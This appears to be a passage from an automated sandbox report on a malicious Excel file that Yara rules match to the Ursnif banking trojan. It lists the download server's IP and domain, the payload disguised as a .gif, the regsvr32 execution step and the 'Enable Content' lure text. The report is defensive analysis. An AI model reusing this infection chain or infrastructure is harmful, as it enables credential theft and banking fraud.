45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84 Source: unknown TCP traffic detected without corresponding DNS query: 45.138.72.84
 Source: global traffic HTTP traffic detected: GET /10.11nov322.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.138.72.84Connection: Keep-Alive Source: global traffic HTTP traffic detected: GET /10.11nov322.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.138.72.84Connection: Keep-Alive
 Found strings which match to known social media urls Show sources
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: bonderlas.xyz Source: unknown DNS traffic detected: queries for: bonderlas.xyz
 Urls found in memory or binary data Show sources
 Source: regsvr32.exe, 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp String found in binary or memory: http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html; Source: sharedStrings.bin String found in binary or memory: http://45.138.72.84/10.11nov322.gif Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0 Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp String found in binary or memory: http://cert.int-x3.letsencrypt.org/0 Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.org0 Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp String found in binary or memory: http://cps.root-x1.letsencrypt.org0 Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0 Source: Dori.ocx.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s Source: Dori.ocx.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0; Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/ Source: Dori.ocx.0.dr String found in binary or memory: http://ocsp.sectigo.com0 Source: msapplication.xml.5.dr String found in binary or memory: http://www.amazon.com/ Source: msapplication.xml1.5.dr String found in binary or memory: http://www.google.com/ Source: msapplication.xml2.5.dr String found in binary or memory: http://www.live.com/ Source: msapplication.xml3.5.dr String found in binary or memory: http://www.nytimes.com/ Source: msapplication.xml4.5.dr String found in binary or memory: http://www.reddit.com/ Source: msapplication.xml5.5.dr String found in binary or memory: http://www.twitter.com/ Source: msapplication.xml6.5.dr String found in binary or memory: http://www.wikipedia.com/ Source: msapplication.xml7.5.dr String found in binary or memory: http://www.youtube.com/ Source: regsvr32.exe, regsvr32.exe, 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp String found in binary or memory: https://bonderlas.xyz Source: regsvr32.exe, 00000001.00000003.906109706.000000000272E000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000003.757764964.0000000002747000.00000004.00000001.sdmp String found in binary or memory: https://bonderlas.xyz/ Source: regsvr32.exe, 00000001.00000003.792943006.0000000002747000.00000004.00000001.sdmp String found in binary or memory: https://bonderlas.xyz/U Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmp, ~DF275CD125B53CA979.TMP.14.dr String found in binary or memory: https://bonderlas.xyz/index.htm Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmp String found in binary or memory: https://bonderlas.xyz/index.htm19j% Source: {847E0F0B-25B1-11EB-90EB-ECF4BBEA1588}.dat.12.dr String found in binary or memory: https://bonderlas.xyz/index.htmRoot Source: regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmp String found in binary or memory: https://bonderlas.xyz/index.htma; Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmp String found in binary or memory: https://bonderlas.xyz/index.htmh Source: {847E0F0B-25B1-11EB-90EB-ECF4BBEA1588}.dat.12.dr String found in binary or memory: https://bonderlas.xyz/index.htmindex.htm Source: regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmp String found in binary or memory: https://bonderlas.xyz/index.htmne Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmp String found in binary or memory: https://bonderlas.xyz/index.htmr= Source: Dori.ocx.0.dr String found in binary or memory: https://sectigo.com/CPS0 Source: regsvr32.exe, 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp String found in binary or memory: http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html; Source: sharedStrings.bin String found in binary or memory: http://45.138.72.84/10.11nov322.gif Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0 Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp String found in binary or memory: http://cert.int-x3.letsencrypt.org/0 Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp String found in binary or memory: http://cps.letsencrypt.org0 Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp String found in binary or memory: http://cps.root-x1.letsencrypt.org0 Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0 Source: Dori.ocx.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s Source: Dori.ocx.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0; Source: regsvr32.exe, 00000001.00000002.932236505.0000000002747000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/ Source: Dori.ocx.0.dr String found in binary or memory: http://ocsp.sectigo.com0 Source: msapplication.xml.5.dr String found in binary or memory: http://www.amazon.com/ Source: msapplication.xml1.5.dr String found in binary or memory: http://www.google.com/ Source: msapplication.xml2.5.dr String found in binary or memory: http://www.live.com/ Source: msapplication.xml3.5.dr String found in binary or memory: http://www.nytimes.com/ Source: msapplication.xml4.5.dr String found in binary or memory: http://www.reddit.com/ Source: msapplication.xml5.5.dr String found in binary or memory: http://www.twitter.com/ Source: msapplication.xml6.5.dr String found in binary or memory: http://www.wikipedia.com/ Source: msapplication.xml7.5.dr String found in binary or memory: http://www.youtube.com/ Source: regsvr32.exe, regsvr32.exe, 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp String found in binary or memory: https://bonderlas.xyz Source: regsvr32.exe, 00000001.00000003.906109706.000000000272E000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000003.757764964.0000000002747000.00000004.00000001.sdmp String found in binary or memory: https://bonderlas.xyz/ Source: regsvr32.exe, 00000001.00000003.792943006.0000000002747000.00000004.00000001.sdmp String found in binary or memory: https://bonderlas.xyz/U Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmp, regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmp, ~DF275CD125B53CA979.TMP.14.dr String found in binary or memory: https://bonderlas.xyz/index.htm Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmp String found in binary or memory: https://bonderlas.xyz/index.htm19j% Source: {847E0F0B-25B1-11EB-90EB-ECF4BBEA1588}.dat.12.dr String found in binary or memory: https://bonderlas.xyz/index.htmRoot Source: regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmp String found in binary or memory: https://bonderlas.xyz/index.htma; Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmp String found in binary or memory: https://bonderlas.xyz/index.htmh Source: {847E0F0B-25B1-11EB-90EB-ECF4BBEA1588}.dat.12.dr String found in binary or memory: https://bonderlas.xyz/index.htmindex.htm Source: regsvr32.exe, 00000001.00000002.932139128.00000000026DA000.00000004.00000020.sdmp String found in binary or memory: https://bonderlas.xyz/index.htmne Source: regsvr32.exe, 00000001.00000003.822159102.0000000002709000.00000004.00000001.sdmp String found in binary or memory: https://bonderlas.xyz/index.htmr= Source: Dori.ocx.0.dr String found in binary or memory: https://sectigo.com/CPS0
 Uses HTTPS Show sources
 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722 Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738 Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737 Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735 Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734 Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722 Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738 Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737 Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735 Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443 Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734 Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443

### Key, Mouse, Clipboard, Microphone and Screen Capturing:

 Yara detected Ursnif Show sources
 Source: Yara match File source: 00000001.00000003.667994704.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668473808.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668884278.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668296205.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.667535091.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.667824445.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668952879.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.667736217.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.667639814.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668760618.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668844490.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668083281.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668527386.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668803877.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669148269.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668230712.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669122907.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669084633.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668920606.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.667912734.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669040349.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.667438738.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669062801.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669138033.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669012249.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.932781395.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668636640.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668166944.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669108055.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668584629.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668358027.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668983216.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1620, type: MEMORY

### E-Banking Fraud:

 Yara detected Ursnif Show sources
 Source: Yara match File source: 00000001.00000003.667994704.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668473808.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668884278.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668296205.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.667535091.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.667824445.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668952879.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.667736217.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.667639814.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668760618.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668844490.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668083281.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668527386.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668803877.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669148269.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668230712.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669122907.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669084633.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668920606.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.667912734.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669040349.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.667438738.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669062801.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669138033.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669012249.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.932781395.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668636640.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668166944.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.669108055.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668584629.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668358027.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000003.668983216.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1620, type: MEMORY

### System Summary:

 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) Show sources
 Source: Screenshot number: 4 Screenshot OCR: Enable Editing" 11_ from the yellow bar above 12 ::- @ Once You have Enable Editing, please click Source: Screenshot number: 4 Screenshot OCR: Enable Content" 15" from the yellow bar above 16 17 18 WHY I CANNOT OPEN THIS DOCUMENT? 19 20 Source: Screenshot number: 4 Screenshot OCR: Enable Editing" 11_ from the yellow bar above 12 ::- @ Once You have Enable Editing, please click Source: Screenshot number: 4 Screenshot OCR: Enable Content" 15" from the yellow bar above 16 17 18 WHY I CANNOT OPEN THIS DOCUMENT? 19 20
 Found Excel 4.0 Macro with suspicious formulas Show sources
 Source: Rrapporto.xlsb Initial sample: EXEC Source: Rrapporto.xlsb Initial sample: EXEC
 Found abnormal large hidden Excel 4.0 Macro sheet Show sources
 Source: Rrapporto.xlsb Initial sample: Sheet size: 583568 Source: Rrapporto.xlsb Initial sample: Sheet size: 583568
 Found obfuscated Excel 4.0 Macro Show sources
 Source: Rrapporto.xlsb Initial sample: High usage of CHAR() function: 97 Source: Rrapporto.xlsb Initial sample: High usage of CHAR() function: 97
 Office process drops PE file Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\ProgramData\Dori.ocx Jump to dropped file Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gif Jump to dropped file Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\ProgramData\Dori.ocx Jump to dropped file Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gif Jump to dropped file
 Writes or reads registry keys via WMI Show sources
 Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
 Writes registry values via WMI Show sources
 Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
 Dropped file seen in connection with other malware Show sources
 Source: Joe Sandbox View Dropped File: C:\ProgramData\Dori.ocx 7A5E4FD35A1A636EF1BEB7E62CC647D7E63F5C7AADD2AA1A49D49C81183ACA93 Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gif 7A5E4FD35A1A636EF1BEB7E62CC647D7E63F5C7AADD2AA1A49D49C81183ACA93 Source: Joe Sandbox View Dropped File: C:\ProgramData\Dori.ocx 7A5E4FD35A1A636EF1BEB7E62CC647D7E63F5C7AADD2AA1A49D49C81183ACA93 Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gif 7A5E4FD35A1A636EF1BEB7E62CC647D7E63F5C7AADD2AA1A49D49C81183ACA93
 Tries to load missing DLLs Show sources
 Classification label Show sources
 Source: classification engine Classification label: mal100.bank.troj.expl.evad.winXLSB@21/85@7/2
 Creates files inside the user directory Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\Desktop\~$Rrapporto.xlsb Jump to behavior Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\Desktop\~$Rrapporto.xlsb Jump to behavior
 Creates temporary files Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{3D6002A5-3C2F-4D7A-9909-C104E420DDD5} - OProcSessId.dat Jump to behavior Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{3D6002A5-3C2F-4D7A-9909-C104E420DDD5} - OProcSessId.dat Jump to behavior
 Queries process information (via WMI, Win32_Process) Show sources
 Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from win32_process Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from win32_process
 Reads the hosts file Show sources
 Spawns processes Show sources
 Uses an in-process (OLE) Automation server Show sources
 Found graphical window changes (likely an installer) Show sources
 Source: Window Recorder Window detected: More than 3 window changes detected Source: Window Recorder Window detected: More than 3 window changes detected
 Document is a ZIP file with path names indicative of goodware Show sources
 Source: Rrapporto.xlsb Initial sample: OLE zip file path = xl/media/image1.png Source: Rrapporto.xlsb Initial sample: OLE zip file path = xl/media/image2.png Source: Rrapporto.xlsb Initial sample: OLE zip file path = xl/media/image1.png Source: Rrapporto.xlsb Initial sample: OLE zip file path = xl/media/image2.png
 Checks if Microsoft Office is installed Show sources
 Uses new MSVCR Dlls Show sources